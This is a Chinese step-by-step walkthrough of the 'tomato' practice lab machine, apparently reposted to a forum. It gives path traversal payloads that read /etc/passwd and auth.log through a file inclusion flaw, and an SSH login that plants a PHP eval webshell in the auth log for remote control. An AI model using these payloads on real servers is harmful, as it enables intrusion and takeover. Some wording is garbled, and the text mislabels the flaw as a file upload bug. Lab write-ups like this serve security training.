tomato靶场通关攻略
1.御剑2014找到IP地点https://i-blog.csdnimg.cn/direct/034bd55c270f4a1ea48bacca0f33d9d1.png
2.dirb扫描目录
https://i-blog.csdnimg.cn/direct/6b7372964be743598439411353185d2b.png
3.再次详细扫描目录
https://i-blog.csdnimg.cn/direct/606d50ad4e974ec58cd433b7515f3cf0.png
4.访问找到的目录文件
https://i-blog.csdnimg.cn/direct/302c4338d3c44c868b33f551f30be36f.png
进入antibots中
https://i-blog.csdnimg.cn/direct/15de4a13c7d04f058a84b37bdbdc53c2.png
5.征采一会再info.php里面发现有东西
https://i-blog.csdnimg.cn/direct/4d9c75594b704974b3a3c006720a220d.png
6.这个地方貌似可以举行利用
https://i-blog.csdnimg.cn/direct/ac765474433f4b54b2afcfb9f3b99d4b.png
7.查看源代码发现包罗include文件上传漏洞
https://i-blog.csdnimg.cn/direct/25370d28a28f4d43a51aa523528fea3d.png
8.网址后面跟?image=../../../../../../../etc/passwd
https://i-blog.csdnimg.cn/direct/1cdb85954f2942b5a6d431d79df7e40f.png
9.既然可以查看暗码文件,那我们查看一下别的文件试试
?image=../../../../../../var/log/auth.log
https://i-blog.csdnimg.cn/direct/c5eb67c116da4ac78ae98da06f459ae2.png
10.反弹shell
将一句话木马作为ssh登录的用户名,然后登陆,暗码随便输入,如许日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。
ssh '<?php phpinfo();eval($_POST['sss']);?>'@172.16.1.113 -p 2211
https://i-blog.csdnimg.cn/direct/ae8886de2e904c00b2056f7bb7b10be1.png
11.蚁键毗连
https://i-blog.csdnimg.cn/direct/1d21be1e328843e299396bf34e6d95d6.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]